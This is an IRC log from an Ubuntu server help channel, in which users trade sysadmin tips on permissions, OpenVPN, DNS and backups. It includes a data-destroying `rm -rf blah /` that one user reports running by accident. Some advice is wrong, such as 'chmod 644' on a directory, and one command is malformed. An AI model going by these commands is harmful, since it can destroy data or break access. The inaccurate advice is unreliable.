<chmac> Theban: If you're running in screen you can ctrl-ESC and then page up / down to go back / forward
<_ruben> Theban: the console has a scrollback buffer as well
<chmac> Theban: blah --help | less as soren said, or shft-pgup/pgdn
<Theban> oh sorry
<_ruben> Theban: but per page: somecommand | more
<ropetin> Does anyone have experience with rsyslog?
<Ergo^> ï»¿http://paste2.org/p/78076 - is it safe how i set up my hostname, origin and destination ?
<scuser> slangasek: but I couldn't find pam_krb5 after I've installed libpam-krb5, any ideas
<slangasek> scuser: it's not a command, it's a pam module.  You have to configure /etc/pam.d/common-* to use it; there are probably howtos somewhere that explain it
<slangasek> sorry, I don't know the locations of any off-hand
<scuser> slangasek: ok thanks for the hint anyway I'll try to search for it, thanks for your time :)
<Theban> sorry for the silly question but what is the command for making a folder readonly to a user but still full access for root?
<ropetin> Theban: Do you want it to be readonly to all users or just one in particular?
<sh4lindev> chown root folder; chmod 644 folder
<Theban> read-only to the user that currently has read/write privs
<ropetin> What sh4lindev just mentioned will give the owner read/write, the group and world read only
<ropetin> Does that do what you want?
<Theban> so it will change the owner to root and make everyone else read-only
<Theban> ?
<ropetin> No, you would need to 'chown root:root filename' to change the owner
<Theban> ok, so i have a folder in which a user owns and has read/write permissions
<Theban> i want that user to have read-only permissions
<ropetin> so 'chown -R root:root /folder/location;
<ropetin> ' sorry
<ropetin> Then do what sh4lindev mentioned
<Theban> chown -R root:root /folder/location && chown root /folder/location && chmod 644 /folder/location
<Theban> yes?
<ropetin> don't need the middle chown
<Theban> ok
<Theban> chown -R root:root /folder/location && chmod 644 /folder/location
<Theban> all good?
<ropetin> Yup
<Theban> tyvm
<ropetin> NP!
<uvirtbot> New bug: #273888 in php5 (main) "php5-gd failed to install due to unmet dependencies" [Undecided,New] https://launchpad.net/bugs/273888
<gianni> hi
<gianni> i have 3 pc (10.1.1.101 SERVER - 10.1.1.102 client1 - 10.1.1.1003 client2) can i configure my server vpn for talk with client1 and client2? my actual daemon config file is http://pastebin.ubuntu.com/50014/
<ikonia> gianni: if they are both on the same vpn - they will be able to see each other
<gianni> ikonia the question is: how can i configure the client2 in openvpn server conf file ?
<gianni> http://pastebin.ubuntu.com/50014/
<gianni> client2 is 10.1.1.103
<ikonia> gianni you shouldn't need to
<ikonia> gianni: if you make a vpn connection to the same network - you should be on that network
<gianni> ikonia please see conf file..
<ikonia> I've just looked
<ikonia> what vpn daemon are you using ?
<Deeps> gianni: you need to read the openvpn howto for multiple clients
<ikonia> is your network offering dhcp ?
<gianni> it make a vpn to 10.1.1.101 (server) to 10.1.1.102 (client1)
<Deeps> gianni: as you're currently configured for a single client on a static key
<gianni> deeps true.. i should conf it for two client
<gianni> with single key
<gianni> how can i change my conf ? some suggest ?
<Deeps> gianni: http://openvpn.net/howto.html#pki
<Deeps> gianni: read the howto, it's a long process
<Deeps> gianni: section: "Setting up your own Certificate Authority (CA) and generating certificates and keys for an OpenVPN server and multiple clients"
<ikonia> Deeps: good guide
<gianni> uhm..
<gianni> i cant use same key with no cert for all clients ?
<ikonia> gianni: read that guide, it's excellent
<ikonia> I'd forgot about that guide
<Deeps> gianni: read the howto, it explains everything in full detail
<gianni> i saw that but dont reply to my question.
<Deeps> gianni: and you'll get better answers from that guide than you will from irc
<Deeps> gianni: it does, read it from the start.
<gianni> my question is: It`s possible make a VPN with 1 server and 2 client with onlyone key and no cert ecc. ?
<ikonia> gianni: the guide gives you the config to use
<gianni> if so, what i should change in my conf?
<gianni> ikonia false..
<hads> It does.
<gianni> guide dont reply to it..
<gianni> guide say make cert, make keys bla bla bla..
<gianni> other method.
<Theban> howto remove a folder that is not empty?
<ikonia> Theban: -rf
<Theban> ty
<hads> -r alone is probably a better start :)
<ikonia> gianni: thats the correct method to use
<Theban> oh?
<gianni> ikonia but my question is different.
<ikonia> Theban: -f =force
<ikonia> gianni: no it's not
<ikonia> gianni: you need to setup the certs
<gianni> ikonia yes it is
<gianni> no it isnt
<gianni> i can use single key too.
<hads> Then OpenVPN docs on their site are pretty good. I've read through them and they do cover what you're asking.
<ikonia> gianni: I'm scan reading it now - and to get multiple clients running you'll need to set up a multiple client config that is the certificate method in that guide
<ikonia> gianni: if you know you can use a single key - why are you asking if you can
<gianni> ikonia because i dont know how to edit my conf
<Theban> sudo rmdir -r folder
<Theban> ?
<ikonia> gianni: but that guide says to not do that
<gianni> theban rm -rf folder
<hads> Theban: Correct. Be careful with that though.
<ikonia> Theban: sorry rm -r dir
<Theban> ty
<hads> Of course I can't read, what ikonia said.
<gianni> ikonia: i dont found it..
<ikonia> gianni: follow the guide - or don't - it's up to you
<ikonia> gianni: that guide is excellent though and from the official site and is giving you the "correct" way to do this
<gianni> ikonia if i use this method i have one motivation.
<gianni> and this howto dont reply to my question.
<ikonia> gianni: contact open vpn support methods then
<gianni> ...........
<ikonia> gianni: you've been given the correct answer for how to achieve what you want
<Theban> i need to give a file read access by anyone
<Theban> what is the chmod for that?
<henkjan> chmod a+r
<henkjan> sorr
<henkjan> sorry
<Theban> ?
<henkjan> thats wrong
<Theban> do you know it?
<slangasek> no, it isn't
<henkjan> okay, a+r works
<henkjan> but a-r removes read access for everyone
<slangasek> yes, + is the opposite of - ?
<Theban> i'm guessing a+w is write then? lol
<slangasek> yes.  perhaps you would find it helpful to read the chmod manpage?
<Theban> good point ^_^
<Theban> thx much
<Theban> does vncviewer work only if the computer your connecting to has a gui?
<ropetin> Theban: Yup
<ropetin> Otherwise, ssh is probably better
<Theban> can windows ssh to a linux server?
<gianni> sure google putty.exe
<ropetin> Yup yup!  PuTTY is a popular client
<marc-andre> hiho
<Theban> hi
<marc-andre> i search for a simple solution to monitor in the console my apache2
<marc-andre> i remember under my old Gentoo server i had something included in my apache installation
<hads> Monitor how?
<marc-andre> how many forks are running, how many clients are connected, this kind of stats
<hads> I did run across something like that once. Can't recall the name off the top of my head
<marc-andre> i found apachetop, but its not what i am looking for
<Theban> how can i have my ubuntu server run a mount command on startup?
<hads> Theban: Typically if you want to mount something at startup you'd put it in /etc/fstab
<Theban> just edit fstab and add the mount line as i would type it?
<Theban> err wait
<Theban> nvm
<Theban> forget i said that haha
<hads> :)
<hads> man fstab and the comments in it will show you
<ghaleb_> hello, my freeradius server accept login from radtest using LDAP, but from NAS it doesn't .. saying:rlm_ldap: Attribute "User-Password" is required for authentication.
<sommer> ghaleb_: can you configure the NAS to use the userPassword attribute?
<ghaleb_> sommer: I don't think so,  the NAS is  a wireless  access point
<uvirtbot> New bug: #273949 in nagios2 (universe) "Nagios WebGUI appearance is broken after Hardy Update" [Undecided,New] https://launchpad.net/bugs/273949
<zzgvh> Dunno if anyone remebers me from yesterday, I'm trying to set up a hardy server host with several virtual hardy server guests. I managed to get one guest working with ubuntu-vm-builder and some fudging. After that I used virt-clone to create another guest. The guests have static IP numbers and I had to change eth0 to eth1 in /etc/network/interfaces to get networking to play ball. So now I can start one guest and ssh to it on t
<henkjan> zzgvh: look in /etc/udev/rules.d/70-persistent-net.rules
<uvirtbot> New bug: #255368 in ebox (universe) "ebox: Depends: libapache-authcookie-perl but it is not installable " [Undecided,Confirmed] https://launchpad.net/bugs/255368
<zzgvh> Hehe...I've been there. Problem is I don't understand it ;-) Not a ubuntu guru...so I don't know what to look for. There's config info there for eth0 and eth1 with different MACs, all other attributes look the same
<kirkland> sommer: i'm looking at it now
<zzgvh> Alternatively, is there some other way to create clones from a master VM? I'm just looking for a way ahead here, it doesn't have to be using virt-clone
<sommer> kirkland: cool, I think cjwatson may have fixed it... unattended-upgrades package not on the server cd, or something like that
<kirkland> sommer: just saw that :-)
<kirkland> sommer: thanks for the report and heads up
<sommer> kirkland: no problem
<kirkland> nxvl: could you perhaps help translate bug #273731?  :-)
<uvirtbot> Launchpad bug 273731 in bacula "no se que contraseÃ±a me piden y por que si es un paquete de sinapsy Â¿acaso no son libres?" [Medium,New] https://launchpad.net/bugs/273731
<nxvl> kirkland: working on it
<kirkland> nxvl: thanks, dude
<nxvl> kirkland: heh, you don't really want me to translate it
<nxvl> :P
<nxvl> it's not a bug
<nxvl> it's a complaing about "why do i need to write password, isn't this a free OS"
<kirkland> nxvl: :-)  nice, would you respond and close it?
<kirkland> nxvl: ???
<nxvl> yup
<uvirtbot> New bug: #273988 in openldap (main) "Fails to upgrade from hardy to intrepid" [Undecided,New] https://launchpad.net/bugs/273988
<uvirtbot> New bug: #274012 in postfix (main) "postfix install ubuntu server edition fails because of dependencies" [Undecided,New] https://launchpad.net/bugs/274012
<RediXe> mySQL default port is 3306?
<thefish> RediXe: yep
<RediXe> thefish, thx
<uvirtbot> New bug: #274050 in ebox (universe) "Install Ebox with Ubuntu Intrepid Alpha 6 failed (dup-of: 255368)" [Undecided,New] https://launchpad.net/bugs/274050
<kopa> alias
<ivoks> nxvl: thank you for the comment on the bacula bug :D
<nxvl> ivoks: :D i have ROFL reading that bug
<nxvl> is just "complain, complain complain complain"
<nxvl> and in funny ways
<nxvl> and about unimportant stuff
<ivoks> i tought its the same bug as the one with mysql
<ivoks> the on for mysql was in german :D
<nxvl> this one says: "why is this so difficult, why it ask me a password, isn't free? internet should be free for everyone"
<nxvl> and it was just gksu asking for her password
<ivoks> nah... during install, one must provide password for pgsql user :)
<nxvl> then it's that
<nxvl> she was complaining about a password "that noone tolds me which it is"
<ivoks> maybe it's a but in translation
<ivoks> maybe it isn't clear that user should provide a password
<ivoks> s/but/bug/ :D
<nxvl> maybe
<nxvl> i don't have any spanish system on hands
<nxvl> and i don't want one
<nxvl> :D
<ivoks> :)
<bdmurray> Who hanles the print server?
<mathiaz> bdmurray: noone in particular - what's your issue ?
<bdmurray> mathiaz: bug 254581
<uvirtbot> Launchpad bug 254581 in ubuntu-meta "Ubuntu Server Print-server doesn't pull in all the printer modules and ppds" [Undecided,Triaged] https://launchpad.net/bugs/254581
<mathiaz> bdmurray: right
<mathiaz> bdmurray: why do you ask ?
<bdmurray> mathiaz: I was just reviewing that reporter's bugs
<uvirtbot> New bug: #274108 in postfix (main) "postfix set-permissons fails" [Undecided,New] https://launchpad.net/bugs/274108
<melter> i have a server w/ 2 scsi cards, 2 drives on each (4 total); how do i get the installer to install a mbr?
<melter> is there a step-by-step, detailed document for installing ubuntu server?
<mathiaz> !serverguide | melter
<ubottu> melter: The Ubuntu server guide may be found at http://help.ubuntu.com/8.04/serverguide/C/
<nxvl> sommer: btw, i was looking for an opevpn guide yesterday and i noticed that we haven't one on the server guide, any plans for it?
<lamont> nxvl: say like a link to openvpn's howto?
<nxvl> lamont: i'm not sure about linking external howto's into the server guid
<nxvl> guide*
<sommer> nxvl: I didn't have any plans for intrepid, but might not be a bad idea for jaunty
<nxvl> sommer: :D
<nxvl> sommer: if it's on your ToDo list i'm happy
<sommer> nxvl: the idea is now on the list
 * nxvl HUGS sommer 
<melter> mathiaz: is that all? nothing step-by-step, including how to configure grub?
<mathiaz> melter: the installer should take care of installing grub correctly (at least on the primary disk in your case)
<melter> mathiaz: it's not, though
<melter> i tried booting from all 4 drives, one by one, and none has a mbr
<melter> i tried running the grub install from the menu, but it doesn't prompt me
<melter> this is happening on 2 of my 4 servers
<melter> so it's not just 1 server
<mathiaz> melter: but the installer correctly detects your four drives and is able to install the system on one of them ?
<nxvl> melter: https://help.ubuntu.com/8.04/serverguide/C/installing-from-cd.html
<melter> mathiaz: yes, i'm splitting the install across all 4, no problem
<melter> everything works great, but i just can't boot
<nxvl> melter: did it promts grub on install?
<nxvl> err
<nxvl> on boot
<melter> no
<nxvl> not even that?
<melter> i have an old lilo boot from a previous install, it finds that, but just prints "L 99 99 99....."
<mathiaz> melter: right - so you're using a RAID setup ?
<melter> but that's supposed to be overwritten, because the system it's looking for no longer exists
<melter> mathiaz: no, one drive has /, one has /home, one has /usr/local, and one has /boot, swap, and /opt
<melter> no raid, no lvm, no encryption, nothing fancy, just plain old ext3 (ext2 for /boot)
<mathiaz> melter: why do you want to put /boot on its own drive ?
<melter> mathiaz: /boot, /opt, and swap are three partitions on the smaller drive
<mathiaz> melter: try to put /boot on the same drive as / - your setup may confuse the installer.
<melter> mathiaz: ok, i'll give that a shot
<bdmurray> mathiaz: is that print-server bug not that important or ?
<FFEMTcJ> i was told that there is something i can install from the repos  that will take my server install back to default.. does anyone know anything about this?
<mathiaz> bdmurray: it's a suggestion that should be discussed - but it's not critical.
<bdmurray> mathiaz: I'll set the importance to Low? to reflect that then
<mathiaz> bdmurray: wfm
<mathiaz> sommer: I'm reviewing the ldap section of the server guide.
<mathiaz> sommer: I think the usage of slapadd should be replaced with ldapadd in the section about ldap population
<mathiaz> sommer: so that you don't have to stop the server when adding new entries.
<infinity> mathiaz: Nonsense, slapcat/sed/slapadd are the way and the light!
<infinity> mathiaz: (And this is why no one lets me administer LDAP systems...)
<melter> mathiaz: i got rid of /boot, and it still doesn't work
<uvirtbot> New bug: #274178 in dhcp3 (main) "dhcp3-client can't set IP address due to insufficient rights" [Undecided,New] https://launchpad.net/bugs/274178
<sommer> mathiaz: sounds reasonable, I'll update the commands
#ubuntu-server 2008-09-25
<dena> can someone help me? I was bridging one of my network connections and set my eth1 device back to static and now DNS isn't working...
<dena> tried everything I can think of...
 * flyback goes to cook a steak
 * flyback gets overwealmed
<lukehasnoname> I have to say, gentlemen, it seems a LOT of strong progress has been made on Ubuntu server in the past 6 months
 * flyback bbl
<lukehasnoname> Anyone know if any big changes were made to the installer between alpha 5 and 6?
<uvirtbot> New bug: #274233 in samba (main) "Unable to login, GDM or console" [Undecided,New] https://launchpad.net/bugs/274233
<hotmonkeyluv> I cannot create a volume group in the setup of 8.04. When I select the option and press enter, I am just taken back to the "partition disks" overview screen. I have 3 disks that are SCSI 18GB, and they each have one partition on them that says "lvm" and the option is "K" (not sure what that means). Any words of wisdom from the community?
<lhnn> if you had asked me 15 minutes ago I could have helped
<lhnn> I was installing hardy on my server
<lhnn> heh
<hotmonkeyluv> lol, I got it
<hotmonkeyluv> i just restarted 3 times, and somehow it worked
<hotmonkeyluv> btw, do you know the way to untar a .tar.gz file with the command line?
<ropetin> tar -xzvf file.tar.gz
<hotmonkeyluv> thanks!
<ropetin> NP!
<lhnn> Again, I will recommend that the motd be changed to remind users of their local copy of the documentation on intrepid server, if they installed it.
<lhnn> ping kirkland just to make sure someone 'important' sees my recommendation.
<kgoetz> pretty random comment
<ropetin> kgoetz: ?
<kgoetz> ropetin: lhnn 's coment. random, i felt it was
<scuser> hi all, does anyone know which file is the pam configuration file for ubuntu 8.04
<scuser> ?
<lhnn> kgoetz: I was discussing some days ago how users need to be aware of the fact that they have documentation right on their computer
<kraut> moin
<kgoetz> i've seen the conversation before, i just cant remembrer who i was having it with
<chmac> I want to run something through two 's/foo/bar/g' processes, best to sed | sed, or somehow have sed process it one pass?
<soren> sed -e one_expression -e another_expression
<soren> chmac: ^
<chmac> soren: Sweet, thanks :)
<soren> chmac: np :)
<chmac> Is there a silent version of `myqldump -qp blah | gzip | sudo tee blah.sql.gz` ?
<ropetin> chmac: pipe it out to /dev/null?
<chmac> ropetin: Neat trick, didn't think of that...
<chmac> All the gzip output just borked my terminal :)
<ropetin> chmac: Yeah, I didn't think fo that :)
<chmac> So this should work right `myqldump -qp blah | gzip | sudo tee blah.sql.gz > /dev/null` ?
<chmac> ropetin: I get a weird password issue when I try that
<chmac> It asks for the mysqldump and sudo passwords simultaneously on the same line
<chmac> But I don't need a password if I `sudo tee`
<chmac> Anyway, I piped the output somewhere else and moved it afterwards :)
<scuser> hi all, does anyone know how to configure nsswitch.conf file to search for kerberos authentication beside of passwd ?
<Kamping_Kaiser> chmac, why tee a gz?
<chmac> Kamping_Kaiser: Can one pipe into gzip and have it write to a standard file?
<chmac> Kamping_Kaiser: I want to gzip compress mysqldump output and write it to a file that I need sudo to write to
<chmac> So `sudo mysqldump -qp blah | gzip > blah.sql.gz` fails because the > has my regular user permissions, not sudo permissions
<chmac> I could probably do something like `sudo $(mysqldump -qp blah | gzip > blah.sql.gz)` I guess...
<Kamping_Kaiser> chmac, |sudo gzip perhaps
<chmac> Kamping_Kaiser: Interesting, that might well work...
<Kamping_Kaiser> although the sudo $() is nice (or just run the damn thing as root if its going to be regular)
<Kamping_Kaiser> chmac, does mysqldump support dumping to a compressed file? i thought it did
<chmac> Kamping_Kaiser: In principle we use sudo to log actions on the server
<chmac> Not sure if that actually happens or not though :)
<chmac> Kamping_Kaiser: Nope, | sudo gzip doesn't work
<Kamping_Kaiser> chmac, if its run by users, i'd agree. if its a regular thing, (eg cron) i'd go for root
<chmac> Even `sudo mysqldump > blah.sql` doesn't work
<chmac> Kamping_Kaiser: Agreed, for something scheduled, root would make sense
<chmac> Or fix the permissions so a lower user can write the file!
<Kamping_Kaiser> chmac, i was about to ask why your trying to write to a dir your nto allowd to
<chmac> rope-tin suggested piping to /dev/null which worked `mysqldump -qp blah | gzip | sudo tee blah.sql.gz > /dev/null`
<Kamping_Kaiser> i still want to ask why your trying to write somewhere you cant
<chmac> Kamping_Kaiser: I'm dumping a database and saving the backup near the web root, which my user doesn't have write access to
<Kamping_Kaiser> chmac, thought about using a set uid/gid on the dir?
<chmac> Kamping_Kaiser: You mean changing ownership?
<Kamping_Kaiser> chmac, not as such.
<chmac> Kamping_Kaiser: Ok, not sure what set uid/gid means then
<chmac> Kamping_Kaiser: But it's more of a theoretical problem than an actual one!
<chmac> `mysqldump -qp blah | gzip > ~/blah.sql.gz; mv sudo ~/blah.sql.gz ./` worked a charm :)
<ghaleb__> hello, how can I monitor a graph for server load and network traffic ?
<chmac> ghaleb__: Monitor a graph? Or produce a graph of server load?
<chmac> ghaleb__: Check out monit, might be what you're after
<ghaleb__> chmac: yes, to see a graph representing the load ..etc
<ghaleb__> thank you
<til-> hi, is there an official ubuntu-server license agreement online somewhere?
<chmac> til-: It's GNU I think isn't it?
<chmac> til-: Plus each of the applications will have their own licence
<Kamping_Kaiser> til-, no there isnt. why do you ask?
<til-> on the webpage it says "Your use of any software obtained from this site is subject to the terms of any license agreement provided with the software. Some of these agreements incorporate the terms of the GPL or others..."
<til-> i ask because i was asked to find out.. :)
<til-> and i think it's an interesting point, there surely _are_ restrictions for several pieces of software included in the distro
<Kamping_Kaiser> a large percentage is GNU GPL 2 (or later).
<til-> hm, and how about the rest?
<til-> people tend to assume everything is GPL, i guess
<til-> an example is gnuplot, here's the (non-GPL) license: http://gnuplot.cvs.sourceforge.net/gnuplot/gnuplot/Copyright?view=markup
<Kamping_Kaiser> then the rest are not GPL ... /usr/share/common-licenses is the primary ones
<Kamping_Kaiser> if you need to know every licence, you have to go find them, no one here will give them to you.
<Kamping_Kaiser> almost everything meets the DFSG and is OSI listed
<til-> sure, however, i guess it's the tiny little part which doesn't that makes the difference
<til-> thanks anyway, i wasn't aware of the common-licenses dir
<uvirtbot> New bug: #274350 in likewise-open (main) "cups-pdf cannot create ~/PDF and files in it" [Undecided,New] https://launchpad.net/bugs/274350
<ghaleb__> chmac: monit does view a graphs ?
<chmac> ghaleb__: Not sure, I haven't installed it, but I believe it has a web interface and pretty pictures... :)
<chmac> ghaleb__: Maybe I'm thinking Munin, might want to check that out also
<ghaleb__> thank you
<ghaleb__> chmac: yes exactly thank you really
<chmac> No worries :)
<chmac> As root, I just issued `rm -rf blah /` with a space instead of blah/ - any advice?
<Deeps> lol
<Deeps> reinstall
<Deeps> well
<Deeps> ctrl + c
<Deeps> if it's still going
<Deeps> and hope it's not trashed /home yet
<chmac> It hasn't, it's deleted very little it would seem
<chmac> If I've deleted ls, any suggestion on how to view directory listings? :(
<chmac> Wow, ls has just started working again, some auto-recovery system maybe...
<Deeps> i'd suggest a livecd and mounting the disk to see what's what
<dholbach> hi guys
<dholbach> is there anything we can do about bug 43987?
<uvirtbot> Launchpad bug 43987 in ssl-cert "ssl-cert (1.0.11.0ubuntu1) postinst is broken" [Medium,Confirmed] https://launchpad.net/bugs/43987
<dholbach> smagoun just told me about it, it seems to have slipped through the cracks
<chmac> Turns out the host have some sort of security system running. The command was killed, system files restored, a list of deleted files is being created, and the root password was changed.
<chmac> Happy, happy, happy days
<chmac> Now I'm going to try and sleep :)
<mathiaz> infinity: do you remember why the default index.html page in apache2 was moved from /var/www/apache2-default/ to /var/www ?
<infinity> mathiaz: It certainly wasn't my doing... Does the changelog shed any light?
<infinity> mathiaz: (I didn't even know it was done, that's how out of touch I am)
<mathiaz> infinity: no really - the changelog doesn't give any details on this.
<mathiaz> infinity: see bug 273425
<uvirtbot> Launchpad bug 273425 in apache2 "It's better to have a sub-directory in /var/www for default web files" [Undecided,Incomplete] https://launchpad.net/bugs/273425
<infinity> mathiaz: See, the last time I remember discussing this in debian-apache, we were talking about moving the default to /usr/share, so it wasn't in admin space at all anymore.
<infinity> mathiaz: That bug doesn't relate, though.
<infinity> mathiaz: It's talking about webapps being in /var/www, which has been true for ages.
<infinity> mathiaz: Kay.  Looks like we ship in /usr/share, but copy in postinst if there's no index in /var/www
<infinity> mathiaz: Which really isn't a bit deal if someone prefers to use vhosts, they can just leave the file there (or an empty index)
<Database> How would I link a domain name to my server?
<mathiaz> infinity: right - I'm not sure what the user's issue is.
<mathiaz> infinity: having index.html in /var/www make perfect sense to me.
<mathiaz> Database: point the domain name to the IP address of the your server.
<Database> What, that's it?
<Database> No DNS or anything?
<infinity> That would be the DNS.
<Database> So, I'd install and set up a DNS server on my server, and then just switch the nameservers to it's IP address?
<mathiaz> Database: hm - I'm not sure what you're trying to achieve. Could you elaborate a bit more about your setup and what you wanna do ?
<Database> Sure, sorry.
<Database> Basically, my family has five or six domains.
<Database> The end result is to set up my server to serve web pages and e-mail.
<mathiaz> Database: your five or six domains have dns servers. So you need to update the dns server configuration to point to your server IP.
<Database> Uhhh. Right.
<mathiaz> Database: ex: www.familydomain1.com -> server-IP
<Database> So, I do this at my domain registrar?
<mathiaz> Database: for email, you need to update the MX record for each domain.
<Database> Right.
<mathiaz> Database: probably yes. You domain registar is probably your dns provider
<Database> Oooh.
<Database> I didn't know that.
<mathiaz> Database: or at least can point you to your dns provider.
<Database> Thank you.
<Database> I see a large "Change DNS" button?
<mathiaz> Database: that's probably to change your dns provider.
<Database> I'd imagine, yes ;)
<mathiaz> Database: you'd better figure out which dns provider you're using.
<Database> -nods-
<Database> I'll try and do that.
<Database> I'm hosted with a pretty unknown provider, unfortunately - Freeola.
<mathiaz> Database: freeola is your web hosting company ?
<Database> THey'r emy domain registrar.
<Database> And they /were/ my host, but I switched out.
<mathiaz> Database: right - they're probably your dns provider also.
<Database> Excellent.
<mathiaz> Database: try to figure out if you can change DNS records for you domains.
<Database> I seem to be able to.
<Database> http://freeola.com/support/domain_dns.php
<Database> I see terms that I recognise. :p
<mathiaz> Database: right - so you need to update the A and MX record to point to your server IP.
<Database> Aha, thank you.
<Database> Although, that may be a problem...
<Database> I'm pretty certain I have a dynamic IP address, see.
<mathiaz> Database: then you need to use a service such as no-ip.com
<Database> Alright...
<Database> I have a no-ip account.
<Database> What would I do there?
<Database> And, does it require the pay-for service?
<mathiaz> Database: you'd create a hostname pointing to your dynamic ip address.
<Database> Right.
<Database> So, database404.hopto.org or similar?
<mathiaz> Database: and then create a CNAME record for each of your www.familydomain.com domain pointing to your no-ip hostname
<Database> Oooooh.
<Database> Wow, this is a lot simpler than I thought.
<Database> So I can throw BIND out of the window? :D
<mathiaz> Database: considering that your server is on a dynamic IP adress, running a dns service on it is definetely not a recommended option.
<Database> I can see why, yeah.
<Database> I'm sorry for being a little dense, I am fairly new to server administration, even though I've been using Linux for a while now. :)
<mathiaz> Database: no worries - people in this channel are here to help out :)
<Database> And now I figure out which domain can be changed first to test it :P
<Database> So... once I've changed my domains over, what would I do next to make my server accomodate them all?
<mathiaz> Database: you need to configure apache2 to serve the correct content for each of the domain (via virtual hosts probably)
<Database> Right-o./
<Database> I'm using Lighttpd, but I think the same process will apply.
<mathiaz> Database: and then you also need to setup your mail service to accept mail for all of your domains
<Database> Right, and that's the bit I don't know much about.
<mathiaz> Database: probably - I don't know how to configure virtual hosts for lighttpd.
 * Database nod.
<Database> So, would it just be a case of poking configuration files?
<mathiaz> Database: yes - once you've figured out how you want virtual domains for your mail server.
<Database> Ooooh.
<Database> Virtual domains?
<mathiaz> Database: that would probably require a bit of reading/searching on how to setup postfix to do that
<Database> Well, I can do the Google, so it should be alright.
<mathiaz> Database: the postfix documentation is quite good.
<Database> -nods-
<nxvl> nijaba: \o/
<nxvl> nijaba: i've already spammed some of my friend with the survey
<Database> Oh, and how would I set up subdomains?
<nijaba> nxvl: thanks
<flyback> http://www.youtube.com/watch?v=Wg_JB1P-HBk&feature=related# <--since people always wonder wtf my nick means
<zul> hey ivoks
<ivoks> hello
<ivoks> zul: didn't have time to test drbd today :/ tomorrow is a new day
<zul> fine with me
<ivoks> :)
<mathiaz> ivoks: tomorrow is a new day -> I hope so ! ;)
<ivoks> mathiaz: :)
<ivoks> any advice for a nice server for virtualization?
<ivoks> :)
<ivoks> i can't do dev. on my laptop any more... that's insane :)
<mathiaz> ivoks: ... ubuntu server with kvm.... ?
<ivoks> kvm or vmware
<ivoks> ubuntu, of course...
<mathiaz> ivoks: you'd buy new hardware ?
<ivoks> yes... currently, i'm looking at poweredge T300
<mathiaz> ivoks: ok - so you'd have a proc with virtual extensions - kvm is the best choice than
<mathiaz> ivoks: I've built my own server a couple of month ago
<ivoks> mathiaz: yes, i know that :D
<ivoks> if local supplier doesn't have t300 tomorrow morning, i'll build my own server
<ivoks> :)
<mathiaz> ivoks: make sure that you have a proc that supports the extension - it seems that the default proc for a T300 is a celeron
<mathiaz> ivoks: and add as much RAM as you can - it helps when you run 34890210 guests.
<ivoks> mathiaz: default proc for t300 is quad core :)
<ivoks> oh... you are right
<ivoks> they do have celeron too
<ivoks> anyway, i'm going for a quad
<ivoks> at least 4 gigs of ram
<ivoks> so, how are you guys?
<flyback> a) make sure you have a chipset that supports > 4 gig
<flyback> intel put out some that couldn't even use the full 4 gig even in 64 bit mode cause there wasn't a iommu
<flyback> I think anything that takes a quad core should work
<flyback> b) don't get a shitty power supply or you *anuck*the whole mess
<flyback> c) I will laugh and taunt you if b)
<flyback> d) esxi is pretty cool although it's picky about hw
<flyback> e) uC**Tu server has pissed me off to the point of wanting to kill you all, but I finally think I worked around most of the bugs
<flyback> using it as a host for vmware server 1.0x on some headless blades
<ivoks> did you report those bugs?
<flyback> no because some of them are already know and also I suspect interactions with the blade hw
<flyback> seems the whole ubuntu serial libary routines, or terminal routines or some combo of both are weird
<flyback> I had to patch for that "unsupported blah blah will be depreciated soon" crap in newer 2.6 kernels with older ubuntu's
<flyback> when I connect to a blade thru telnet to the management interface ip then link to the virtual com port
<flyback> I get wacky problems with editors in ubuntu
<flyback> nano starts smashing lines together and doing "CAN NOW UNJUSTIFY) (yes with the wrong grammer too)
<flyback> when I try to save
<flyback> little hard to fix the network config scripts after a disk clone when the only interface is the one buggered
<flyback> since it's not happening in livecd's I have booted
<flyback> I suspect it's some weird terminal emulation or libary you guys chose as default in 6.06lts
<flyback> and no upgrading to a newer lts was not an option
<ivoks> i didn't understand half of what you just said :)
<flyback> a) 6.06LTS was one of the only ones listeed on a PXE boot server vm that has pxe scripts and installer scripts for, which you need on a headless blade with no expansion slots, video or cdrom
<flyback> b) I can't break vmware server
<flyback> ivoks, it appears that something about ubuntu
<flyback> involving serial routines is non standard and really gets buggered by the blade's serial hw
<ivoks> seting terminal emultaion didn't help?
<flyback> my theroy would be justified by the fact that a kernel patch is needed because of something in ubuntu 6.06
<flyback> that is known
<flyback> I don't think I tried that much
<flyback> here's the thing
<flyback> it's apprentely only involving non screen printable screen characters
<flyback> why you don't see stuff like you go to save in ubuntu or try to hit enter to move a line down
<ivoks> well, i had some problems with serial modem on 6.06
<flyback> then it goes nuts
<ivoks> that's terminal emulation
<ivoks> export TERM="vt100" would probably solve it :)
<flyback> weird thing is it doesn't happen on systemRescueCd
<flyback> and a few others
<ivoks> you client is expecting terminal VT100, but it gets linux from ubuntu
<ivoks> changing terminal emultaion on ubuntu to VT100 would help, i'm sure
<flyback> I think I tried that once though and it made it worse
<flyback> but ok
<flyback> after I get this backed up I will look into that
<ivoks> there are lots of different terminal emulations
<flyback> yeah I know
<flyback> I was using linux back in the 90's :P
<ivoks> you should know which one your server and client are expecting/using
<ivoks> some of us were using unix before linux :p
<flyback> well it was my first time dealing with headles boxes
<flyback> I was kinda rushed into it
<flyback>    c vbnmx b\
<flyback> I was kinda rushed into it
<sgrover> NFS help?  My mail server mounts an NFS share.  That share gets dropped on a regular basis - sometimes a few hours, sometimes a few weeks... but typically daily.
<sgrover> Takes a reboot of both the mail server and the nfs server to restore - restarting the services is not enough.
<sgrover> I've seen reference to this, and it appears to be a kernel issue.  I've updated the kernels yesterday, but am still experiencing the problem...
#ubuntu-server 2008-09-26
<bdmurray> kirkland: in case I haven't said it this month I love ubuntu documentation search
<trashguy> ubuntu docs are on par with liek FreeBSDs hand book
<trashguy> most documentation fails
<ph8> i'm not sure i'd agree with that
<trashguy> which aspect
<flyback>  sgrover
<ph8> what documentation fails?
<flyback> ubunt 6.06.2 also known as uCUNTu 6.66
<trashguy> u ever read a netware manuel
<slangasek> flyback: you again?
<flyback> yeah
<slangasek> !ops
<ubottu> Help! Channel emergency! (ONLY use this trigger in emergencies) - Mez, LjL, elkbuntu, imbrandon, DBO, gnomefreak, Hobbsee, rob, ompaul, Madpilot, CarlK, crimsun, ajmitch, tritium, Nalioth, thoreauputic, apokryphos, tonyyarusso, PriceChild, Amaranth, jrib, jenda, nixternal, Myrtti, mneptok, Pici, Jack_Sparrow, nickrud, jpds, bazhang, jussi01, or Flannel!
<flyback> ubottu, what the canuck is your problem
<ubottu> I am only a bot, please don't think I'm intelligent :)
<flyback> ubottu, botsnack
<ubottu> Yum! Err, I mean, APT!
<flyback> :)
